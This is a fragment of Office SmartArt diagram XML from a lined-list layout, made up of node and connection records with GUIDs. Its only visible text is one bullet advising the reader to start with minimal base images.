    <dgm:pt modelId="{9C19FAFA-6C7C-E546-9293-93F99CC110BD}" type="pres">
      <dgm:prSet presAssocID="{46F390D7-E66F-4B17-A9E1-00A4E797F5F1}" presName="thickLine" presStyleLbl="alignNode1" presStyleIdx="4" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{EF499956-D8F7-2A47-B241-9F4E8DEF4315}" type="pres">
      <dgm:prSet presAssocID="{46F390D7-E66F-4B17-A9E1-00A4E797F5F1}" presName="horz1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C99F72B8-2853-4E4E-832D-315DD61749D4}" type="pres">
      <dgm:prSet presAssocID="{46F390D7-E66F-4B17-A9E1-00A4E797F5F1}" presName="tx1" presStyleLbl="revTx" presStyleIdx="8" presStyleCnt="10"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{780B563F-4FFD-E94E-B4D1-D7751D989110}" type="pres">
      <dgm:prSet presAssocID="{46F390D7-E66F-4B17-A9E1-00A4E797F5F1}" presName="vert1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{96A112B4-425C-6048-A56E-B0B71A2ADBFF}" type="pres">
      <dgm:prSet presAssocID="{6C7827EC-431F-4490-BF05-7D68AC1F7706}" presName="vertSpace2a" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{9AB02CE4-0C68-DA4F-B5EC-5E8B86377ECA}" type="pres">
      <dgm:prSet presAssocID="{6C7827EC-431F-4490-BF05-7D68AC1F7706}" presName="horz2" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D065E9B3-9167-644E-967F-81C9447A8027}" type="pres">
      <dgm:prSet presAssocID="{6C7827EC-431F-4490-BF05-7D68AC1F7706}" presName="horzSpace2" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3A45EEAD-2779-BC45-824F-44FE0DE4C526}" type="pres">
      <dgm:prSet presAssocID="{6C7827EC-431F-4490-BF05-7D68AC1F7706}" presName="tx2" presStyleLbl="revTx" presStyleIdx="9" presStyleCnt="10"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6002325E-559F-994F-9440-2F9EB30BE5F4}" type="pres">
      <dgm:prSet presAssocID="{6C7827EC-431F-4490-BF05-7D68AC1F7706}" presName="vert2" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{823F416E-0797-144E-9058-C552342365D4}" type="pres">
      <dgm:prSet presAssocID="{6C7827EC-431F-4490-BF05-7D68AC1F7706}" presName="thinLine2b" presStyleLbl="callout" presStyleIdx="4" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5C13D414-7C86-7B43-96CA-84D3B823082F}" type="pres">
      <dgm:prSet presAssocID="{6C7827EC-431F-4490-BF05-7D68AC1F7706}" presName="vertSpace2b" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{1B899804-2F54-0243-9331-0B15BFF38491}" type="presOf" srcId="{46F390D7-E66F-4B17-A9E1-00A4E797F5F1}" destId="{C99F72B8-2853-4E4E-832D-315DD61749D4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{31764E07-E6B3-42EB-8FBB-D33352646297}" srcId="{CD722AA0-7E1C-4D3B-A5D4-08B6AD68DF41}" destId="{46F390D7-E66F-4B17-A9E1-00A4E797F5F1}" srcOrd="4" destOrd="0" parTransId="{A69C432C-5F68-4404-9BC0-F09F2B25B57E}" sibTransId="{7106324C-D77F-4AD0-A21E-B9DDD586B22E}"/>
    <dgm:cxn modelId="{8BB74123-39FC-534A-9BE8-0A93FD3B2A5C}" type="presOf" srcId="{3FA00FA1-419C-470C-AEFD-28BD4DBA701C}" destId="{EF774A23-D505-894F-BE91-DB0C7E89A7E7}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{D228842B-D9D4-4B45-918D-05A0FC0BAF3F}" srcId="{CD722AA0-7E1C-4D3B-A5D4-08B6AD68DF41}" destId="{2E79C6C5-7188-42E7-A67B-739EC16EE7AE}" srcOrd="3" destOrd="0" parTransId="{A3B51159-E7BD-4862-B51F-E2E731E3B3A6}" sibTransId="{53DDB3B7-64A5-404F-8E11-FB3A2E3010BE}"/>
    <dgm:cxn modelId="{D2C0F54D-42DE-4787-9BD1-49D2A92A1ED0}" srcId="{46F390D7-E66F-4B17-A9E1-00A4E797F5F1}" destId="{6C7827EC-431F-4490-BF05-7D68AC1F7706}" srcOrd="0" destOrd="0" parTransId="{AE6210CB-8E49-4D71-9732-CA6B4C7C3EB5}" sibTransId="{2523051B-58FB-4ABE-BC57-11EEC296E07A}"/>
    <dgm:cxn modelId="{C62A4965-8C1C-864D-A827-FEDE1EA0B985}" type="presOf" srcId="{3BC56194-32CF-41E2-874F-5BD119D2ED5B}" destId="{D5AB6AA6-4404-4443-826A-8387E3CAD5A7}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{F6882467-F646-42E2-95CE-BE62585D4A25}" srcId="{122F9603-EB51-40B1-90C8-89ABC61D1615}" destId="{3BC56194-32CF-41E2-874F-5BD119D2ED5B}" srcOrd="0" destOrd="0" parTransId="{4121BD83-5993-43DF-A85E-E66D0E1212BA}" sibTransId="{94A2BCFC-A2BC-4854-B524-45F682E08DA7}"/>
    <dgm:cxn modelId="{0822FC6C-6DB4-4EEA-8C0E-0BDB5F1978DB}" srcId="{CD722AA0-7E1C-4D3B-A5D4-08B6AD68DF41}" destId="{10C1C26F-7BB9-48C6-8156-324557615AFB}" srcOrd="0" destOrd="0" parTransId="{E783EB69-7E99-49C3-B704-7DC6ECC960DD}" sibTransId="{B5434760-57F9-48ED-AF53-AFE020295CF7}"/>
    <dgm:cxn modelId="{0641A076-1911-C44E-8DDE-2720F1AF9DC5}" type="presOf" srcId="{6AF80E36-C872-4942-B69B-4B9FCDD03D7E}" destId="{6059813E-AEF3-6A45-8360-46859E12E897}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{9FD9D482-45B1-134B-A7BA-E7F0BB3D4136}" type="presOf" srcId="{370B5DC9-1D57-44CF-8C37-E03A90AD5EB9}" destId="{AA133D33-0405-1349-BA3E-AFC446231ADF}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{9D2D7093-0D1B-4AAE-B3A6-72BE118A5278}" srcId="{2E79C6C5-7188-42E7-A67B-739EC16EE7AE}" destId="{370B5DC9-1D57-44CF-8C37-E03A90AD5EB9}" srcOrd="0" destOrd="0" parTransId="{0703452F-A7BF-47DF-9351-42207BDAC9FE}" sibTransId="{FDAF581D-2D82-4F37-9A84-B9F7B7976F80}"/>
    <dgm:cxn modelId="{4D4D589A-35FE-4FC9-BC7D-EE25D85F3508}" srcId="{10C1C26F-7BB9-48C6-8156-324557615AFB}" destId="{6AF80E36-C872-4942-B69B-4B9FCDD03D7E}" srcOrd="0" destOrd="0" parTransId="{52D6D80C-0EFA-4407-9AF6-8065086662EB}" sibTransId="{688C6F3F-97D4-404D-A6F8-3C5039C017F8}"/>
    <dgm:cxn modelId="{2E039EA1-E933-48AA-B258-417624FC31CC}" srcId="{CD722AA0-7E1C-4D3B-A5D4-08B6AD68DF41}" destId="{445EB1D3-0E45-4E46-BE9E-C84F9C8838BF}" srcOrd="2" destOrd="0" parTransId="{7DBE506A-B3FC-4BD6-A345-B75296CE8993}" sibTransId="{B1AE5D52-A515-466E-A3B1-96BF7CDFC998}"/>
    <dgm:cxn modelId="{EDFCC3A5-AC85-6940-8A85-2799A3CFE410}" type="presOf" srcId="{6C7827EC-431F-4490-BF05-7D68AC1F7706}" destId="{3A45EEAD-2779-BC45-824F-44FE0DE4C526}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{3A6FB8AF-CB57-9A4D-BC9F-8D92FF6D216F}" type="presOf" srcId="{445EB1D3-0E45-4E46-BE9E-C84F9C8838BF}" destId="{F1EAF90C-B460-5642-A2D7-CECFCBDDDEA9}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{D46596BB-0590-0B43-B6DB-57AD0998223B}" type="presOf" srcId="{10C1C26F-7BB9-48C6-8156-324557615AFB}" destId="{49F8F733-D4C0-F14C-950B-CB4AE49E3EE4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{AA5AD7BF-E8E8-4225-9DFA-60544E6E1083}" srcId="{445EB1D3-0E45-4E46-BE9E-C84F9C8838BF}" destId="{3FA00FA1-419C-470C-AEFD-28BD4DBA701C}" srcOrd="0" destOrd="0" parTransId="{97EB2DEB-FC08-4C71-AE04-DFD1B5678A22}" sibTransId="{172E038E-9946-400D-87CD-D464F663E451}"/>
    <dgm:cxn modelId="{F2D06EC2-6F24-43C5-B252-2F16F42FF1C3}" srcId="{CD722AA0-7E1C-4D3B-A5D4-08B6AD68DF41}" destId="{122F9603-EB51-40B1-90C8-89ABC61D1615}" srcOrd="1" destOrd="0" parTransId="{E7C45DE0-DFD5-4A7E-B0E0-C9F5998419E3}" sibTransId="{1C643D13-63DC-4DEB-8D24-AEFB22317EB5}"/>
    <dgm:cxn modelId="{FCB5D6D0-8BCB-994B-A2EA-86361BF19898}" type="presOf" srcId="{2E79C6C5-7188-42E7-A67B-739EC16EE7AE}" destId="{CEEF9AC1-8FAE-B842-8616-B7B984677B22}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{9295C0DC-D38C-C544-B3B5-F7369FA372E4}" type="presOf" srcId="{122F9603-EB51-40B1-90C8-89ABC61D1615}" destId="{250F70CD-5942-EE4F-B41D-EFDB07A356F6}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{CD5E78DD-2CDB-5D47-9FCF-933F209822E2}" type="presOf" srcId="{CD722AA0-7E1C-4D3B-A5D4-08B6AD68DF41}" destId="{A333706A-65AE-4F46-9A94-8334B48DC444}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{40D262F5-D61E-7E47-A16C-80E0EA8DCF57}" type="presParOf" srcId="{A333706A-65AE-4F46-9A94-8334B48DC444}" destId="{9C47170C-EC18-E94C-858D-76C9C82A2133}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{E6C43E55-025B-D346-84D6-9E754C4782AD}" type="presParOf" srcId="{A333706A-65AE-4F46-9A94-8334B48DC444}" destId="{5D37EC8A-B58D-3447-B060-31A25B068081}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{F9F9A66F-B031-7F47-A87A-B62D4017D51A}" type="presParOf" srcId="{5D37EC8A-B58D-3447-B060-31A25B068081}" destId="{49F8F733-D4C0-F14C-950B-CB4AE49E3EE4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{642E271C-1805-D843-B706-10D661EB7997}" type="presParOf" srcId="{5D37EC8A-B58D-3447-B060-31A25B068081}" destId="{CA649698-3BC4-7342-B72C-6BB83598B49A}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{E51D1944-FD9E-9043-B148-7A386D04610B}" type="presParOf" srcId="{CA649698-3BC4-7342-B72C-6BB83598B49A}" destId="{AB2DA1C5-1276-A24D-8AC7-157937986D01}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{4760E6D6-D6CF-DD4A-B513-96743208E6CA}" type="presParOf" srcId="{CA649698-3BC4-7342-B72C-6BB83598B49A}" destId="{E6B733CA-D7B0-8842-8D76-BBC84A375247}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{92BF443C-654E-F04F-8A4B-379F1C25CBCD}" type="presParOf" srcId="{E6B733CA-D7B0-8842-8D76-BBC84A375247}" destId="{E64DA563-D12F-D24B-A1BD-8F03AB6E594D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{7A02B1E6-F40D-5F4A-AED1-C5A855C86384}" type="presParOf" srcId="{E6B733CA-D7B0-8842-8D76-BBC84A375247}" destId="{6059813E-AEF3-6A45-8360-46859E12E897}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{DF9A9950-5B2E-D543-B293-C7D8D367D3A0}" type="presParOf" srcId="{E6B733CA-D7B0-8842-8D76-BBC84A375247}" destId="{631E5DCF-4D7C-0D46-9388-C4197251CCBF}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{A40DDEE6-B1FB-4047-94E4-866F4026C906}" type="presParOf" srcId="{CA649698-3BC4-7342-B72C-6BB83598B49A}" destId="{DD05A6EF-035A-EE4E-AF1B-E5914F4DF942}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{8C75DEEF-42B5-0444-BBB3-1CB196B82202}" type="presParOf" srcId="{CA649698-3BC4-7342-B72C-6BB83598B49A}" destId="{A0D2C685-1572-D24A-99CD-7116305489AF}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{C2E5C52C-C9DE-9444-A9A1-628DCB442850}" type="presParOf" srcId="{A333706A-65AE-4F46-9A94-8334B48DC444}" destId="{DDC580B2-8F04-C74F-97D2-A1F18532FF99}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{02C4AF1E-308B-E643-A6B1-4E2370C706EA}" type="presParOf" srcId="{A333706A-65AE-4F46-9A94-8334B48DC444}" destId="{344F28D0-9DB4-454C-BF25-AA9A7046ED29}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{7FB4DA17-FF5C-1947-9F7F-BCABDA272E1D}" type="presParOf" srcId="{344F28D0-9DB4-454C-BF25-AA9A7046ED29}" destId="{250F70CD-5942-EE4F-B41D-EFDB07A356F6}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{557EAC8A-EFAF-6A44-9495-C79D24AC9E8A}" type="presParOf" srcId="{344F28D0-9DB4-454C-BF25-AA9A7046ED29}" destId="{F4651DFE-8174-0244-9666-FAF539D1F42F}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{E41265B5-188F-8844-8967-092AE0DB5FF3}" type="presParOf" srcId="{F4651DFE-8174-0244-9666-FAF539D1F42F}" destId="{7F2224D4-F969-3E4D-B72B-816206097752}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{3BB61A21-2104-084F-8377-D663934C20BD}" type="presParOf" srcId="{F4651DFE-8174-0244-9666-FAF539D1F42F}" destId="{C5B9A74E-0F2E-344F-BAAD-3A7F96919952}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{49B4F4D4-8C46-BD41-92D5-802F6A19A114}" type="presParOf" srcId="{C5B9A74E-0F2E-344F-BAAD-3A7F96919952}" destId="{4ED10A33-4E31-5D4B-844C-5E2E69A064A8}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{48A4537A-114D-6E40-B9FF-773C4C3A9965}" type="presParOf" srcId="{C5B9A74E-0F2E-344F-BAAD-3A7F96919952}" destId="{D5AB6AA6-4404-4443-826A-8387E3CAD5A7}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{D7FC7AB2-257C-C345-9D23-95F91AED5466}" type="presParOf" srcId="{C5B9A74E-0F2E-344F-BAAD-3A7F96919952}" destId="{79F14568-F352-F14E-A55B-8CD07E937997}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{6FCC5470-9B3C-6A42-9DB1-ED564A1FB89A}" type="presParOf" srcId="{F4651DFE-8174-0244-9666-FAF539D1F42F}" destId="{B3AB0CA8-C791-9441-AFBF-4C55D2F987AB}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{3B6ED69A-4AB6-7B4E-B5DF-3991A2FD2710}" type="presParOf" srcId="{F4651DFE-8174-0244-9666-FAF539D1F42F}" destId="{00773879-F3DF-5F4F-8CC3-ACCE7E78DA80}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{09791E0A-A551-1547-9BC4-17D93DA8F3AF}" type="presParOf" srcId="{A333706A-65AE-4F46-9A94-8334B48DC444}" destId="{78A6ADF1-E4D7-6143-BA5A-E092DBD81D0E}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{87DD4CCE-3592-074F-90D0-92F170BD6CD4}" type="presParOf" srcId="{A333706A-65AE-4F46-9A94-8334B48DC444}" destId="{FFC10D3A-E52C-294B-960D-DF0A4ABCD60A}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{FCB400C8-B5B9-E44E-812C-731791B6BCC0}" type="presParOf" srcId="{FFC10D3A-E52C-294B-960D-DF0A4ABCD60A}" destId="{F1EAF90C-B460-5642-A2D7-CECFCBDDDEA9}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{8C9C598B-3EFB-0640-9AB1-979A3BAB3CA6}" type="presParOf" srcId="{FFC10D3A-E52C-294B-960D-DF0A4ABCD60A}" destId="{F7E63325-862A-6948-9064-120F4F288BD1}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{D9F15F55-AD6D-B347-A5A3-F3F55D825B03}" type="presParOf" srcId="{F7E63325-862A-6948-9064-120F4F288BD1}" destId="{090B1180-4781-8149-88DC-6FB118E39E7A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{01D1DD02-8B36-FC4B-91F6-E886F92AADC5}" type="presParOf" srcId="{F7E63325-862A-6948-9064-120F4F288BD1}" destId="{2F8E6A30-5DF9-D34E-BEF2-34F409B2998D}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{A17D54AF-8356-8E4B-912A-F26E2E50F8FC}" type="presParOf" srcId="{2F8E6A30-5DF9-D34E-BEF2-34F409B2998D}" destId="{824D660A-8023-E44B-A495-6D078E8EBDEF}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{F8E7A629-2779-0144-A927-2EB4B1CCE36B}" type="presParOf" srcId="{2F8E6A30-5DF9-D34E-BEF2-34F409B2998D}" destId="{EF774A23-D505-894F-BE91-DB0C7E89A7E7}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{EACDEB05-81EF-4240-BBE8-AC24E23BA597}" type="presParOf" srcId="{2F8E6A30-5DF9-D34E-BEF2-34F409B2998D}" destId="{8AD61380-C8E9-7241-BDAF-BE7937385AB8}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{060BB981-774D-E048-82B4-42AB19873DCA}" type="presParOf" srcId="{F7E63325-862A-6948-9064-120F4F288BD1}" destId="{626556BD-3B5E-6845-AD92-F23DB0A3201A}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{50015F18-8DD0-A343-A17C-658DFB7E4E61}" type="presParOf" srcId="{F7E63325-862A-6948-9064-120F4F288BD1}" destId="{FE5A8F67-B8FC-BF48-880E-F4C06A2B8618}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{241F3D3F-102B-9844-BC9A-979EF65C51C1}" type="presParOf" srcId="{A333706A-65AE-4F46-9A94-8334B48DC444}" destId="{528D6731-AE29-2240-B476-CEB1C58506F5}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{090BD654-80DA-0B43-8B25-98454B952D58}" type="presParOf" srcId="{A333706A-65AE-4F46-9A94-8334B48DC444}" destId="{E6D69B64-EEBF-D249-8914-D8A1FB0C5A67}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{59936284-7C24-9348-B748-60B090106E13}" type="presParOf" srcId="{E6D69B64-EEBF-D249-8914-D8A1FB0C5A67}" destId="{CEEF9AC1-8FAE-B842-8616-B7B984677B22}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{10369E8D-57FA-4942-813C-5FF212062572}" type="presParOf" srcId="{E6D69B64-EEBF-D249-8914-D8A1FB0C5A67}" destId="{3F557E8A-7EBB-FD41-8159-4A83FF964E19}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{31F87AA1-83E0-1245-87EE-F182BB3BA581}" type="presParOf" srcId="{3F557E8A-7EBB-FD41-8159-4A83FF964E19}" destId="{DD9C6B84-0B1C-A147-8F91-86C6E716B597}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{7B4277E0-B098-C94D-9CCA-ACEFAB390E62}" type="presParOf" srcId="{3F557E8A-7EBB-FD41-8159-4A83FF964E19}" destId="{C88B33B1-C177-D245-B214-62E0D5018487}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{8CCCBEAE-52F6-9C4B-AA24-AE7B1460E3DC}" type="presParOf" srcId="{C88B33B1-C177-D245-B214-62E0D5018487}" destId="{707C903D-2DFB-A24A-B28B-48C6849E5F9E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{1906DC46-FBB3-364D-AB7D-850F46FD8FB9}" type="presParOf" srcId="{C88B33B1-C177-D245-B214-62E0D5018487}" destId="{AA133D33-0405-1349-BA3E-AFC446231ADF}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{84A95744-E7DA-1C4F-8748-18CE13769714}" type="presParOf" srcId="{C88B33B1-C177-D245-B214-62E0D5018487}" destId="{4D8DBFB6-1624-0646-8A47-00D7A2D68FBA}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{594646FA-A367-EF41-8FAC-5899D014C485}" type="presParOf" srcId="{3F557E8A-7EBB-FD41-8159-4A83FF964E19}" destId="{E3C9D48A-511F-5B45-80D2-160E0710251E}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{0A8A770F-5753-894F-BA22-C56DB362D5EB}" type="presParOf" srcId="{3F557E8A-7EBB-FD41-8159-4A83FF964E19}" destId="{35023DA0-FD66-CD42-A8E1-28E5A7B74EF5}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{5066A7E6-3855-964D-A486-78C5B3ACC81A}" type="presParOf" srcId="{A333706A-65AE-4F46-9A94-8334B48DC444}" destId="{9C19FAFA-6C7C-E546-9293-93F99CC110BD}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{D77FCF3A-4EDE-AD49-806D-E7860EBBCE75}" type="presParOf" srcId="{A333706A-65AE-4F46-9A94-8334B48DC444}" destId="{EF499956-D8F7-2A47-B241-9F4E8DEF4315}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{5045DFE1-5CE7-A441-8652-1F10E961FA6F}" type="presParOf" srcId="{EF499956-D8F7-2A47-B241-9F4E8DEF4315}" destId="{C99F72B8-2853-4E4E-832D-315DD61749D4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{6D7A8541-ABA3-8D4E-AB19-EF9C4506E39D}" type="presParOf" srcId="{EF499956-D8F7-2A47-B241-9F4E8DEF4315}" destId="{780B563F-4FFD-E94E-B4D1-D7751D989110}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{BB919176-C7C1-A64A-871E-A6915E72BF47}" type="presParOf" srcId="{780B563F-4FFD-E94E-B4D1-D7751D989110}" destId="{96A112B4-425C-6048-A56E-B0B71A2ADBFF}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{FF7DBD1A-1B13-A841-AB62-562F4E0C60B6}" type="presParOf" srcId="{780B563F-4FFD-E94E-B4D1-D7751D989110}" destId="{9AB02CE4-0C68-DA4F-B5EC-5E8B86377ECA}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{B84ECA4E-3981-024C-944F-9639058BD64C}" type="presParOf" srcId="{9AB02CE4-0C68-DA4F-B5EC-5E8B86377ECA}" destId="{D065E9B3-9167-644E-967F-81C9447A8027}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{D39FE682-C04B-A346-BBEB-AA84006D8A93}" type="presParOf" srcId="{9AB02CE4-0C68-DA4F-B5EC-5E8B86377ECA}" destId="{3A45EEAD-2779-BC45-824F-44FE0DE4C526}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{C7ADA47E-DCE3-5E46-A590-DB78E885D328}" type="presParOf" srcId="{9AB02CE4-0C68-DA4F-B5EC-5E8B86377ECA}" destId="{6002325E-559F-994F-9440-2F9EB30BE5F4}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{8A7D9C54-B372-CD46-98CE-489BF4A67A76}" type="presParOf" srcId="{780B563F-4FFD-E94E-B4D1-D7751D989110}" destId="{823F416E-0797-144E-9058-C552342365D4}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2008/layout/LinedList"/>
    <dgm:cxn modelId="{471E925E-37EA-274E-9EC3-52B1E41CF77D}" type="presParOf" srcId="{780B563F-4FFD-E94E-B4D1-D7751D989110}" destId="{5C13D414-7C86-7B43-96CA-84D3B823082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B758CE-806A-4F8B-876D-6D75D2B628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0304B9-2A60-4120-8F7F-D56A2BF84697}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-IN"/>
            <a:t>Start with </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" b="1"/>
            <a:t>minimal base images</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8C74A482-0127-4ED9-B26E-B5D055B874DF}" type="parTrans" cxnId="{DCE5E63A-C132-4028-A304-73B22941B5B8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FA3F5AA2-9E33-421B-833C-3C83B6B233C3}" type="sibTrans" cxnId="{DCE5E63A-C132-4028-A304-73B22941B5B8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
